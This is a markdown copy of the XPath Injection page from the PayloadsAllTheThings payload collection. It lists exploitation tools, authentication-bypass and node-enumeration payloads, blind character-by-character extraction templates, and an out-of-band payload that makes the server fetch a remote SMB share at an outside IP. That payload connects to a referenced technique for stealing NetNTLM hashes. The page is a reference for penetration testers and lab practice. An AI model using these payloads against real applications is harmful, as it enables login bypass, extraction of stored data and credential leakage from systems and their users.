index.md (2950B)
1 --- 2 title: "XPATH Injection" 3 topic: "XPATH Injection" 4 topicSlug: "xpath-injection" 5 sourcePath: "XPATH Injection/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/XPATH%20Injection/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # XPATH Injection 12 13 > XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. 14 15 ## Summary 16 17 * [Tools](#tools) 18 * [Methodology](#methodology) 19 * [Blind Exploitation](#blind-exploitation) 20 * [Out Of Band Exploitation](#out-of-band-exploitation) 21 * [Labs](#labs) 22 * [References](#references) 23 24 ## Tools 25 26 * [orf/xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents 27 * [feakk/xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool 28 * [aayla-secura/xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text 29 * [micsoftvn/xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer) 30 * [Harshal35/XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool 31 32 ## Methodology 33 34 Similar to SQL injection, you want to terminate the query properly: 35 36 ```ps1 37 string(//user[name/text()='" +vuln_var1+ "' and password/text()='" +vuln_var1+ "']/account/text()) 38 ``` 39 40 ```sql 41 ' or '1'='1 42 ' or ''=' 43 x' or 1=1 or 'x'='y 44 / 45 // 46 //* 47 */* 48 @* 49 count(/child::node()) 50 x' or name()='username' or 'x'='y 51 ' and count(/*)=1 and '1'='1 52 ' and count(/@*)=1 and '1'='1 53 ' and count(/comment())=1 and '1'='1 54 ')] | //user/*[contains(*,' 55 ') and contains(../password,'c 56 ') and starts-with(../password,'c 57 ``` 58 59 ### Blind Exploitation 60 61 1. Size of a string 62 63 ```sql 64 and string-length(account)=SIZE_INT 65 ``` 66 67 2. Access a character with `substring`, and verify its value the `codepoints-to-string` function 68 69 ```sql 70 substring(//user[userid=5]/username,2,1)=CHAR_HERE 71 substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) 72 ``` 73 74 ### Out Of Band Exploitation 75 76 ```powershell 77 http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE') 78 ``` 79 80 ## Labs 81 82 * [Root Me - XPath injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-Authentication) 83 * [Root Me - XPath injection - String](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-String) 84 * [Root Me - XPath injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-Blind) 85 86 ## References 87 88 * [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://web.archive.org/web/20170325082934/http://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) 89 * [XPATH Injection - OWASP - January 21, 2015](https://web.archive.org/web/20240217030110/http://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))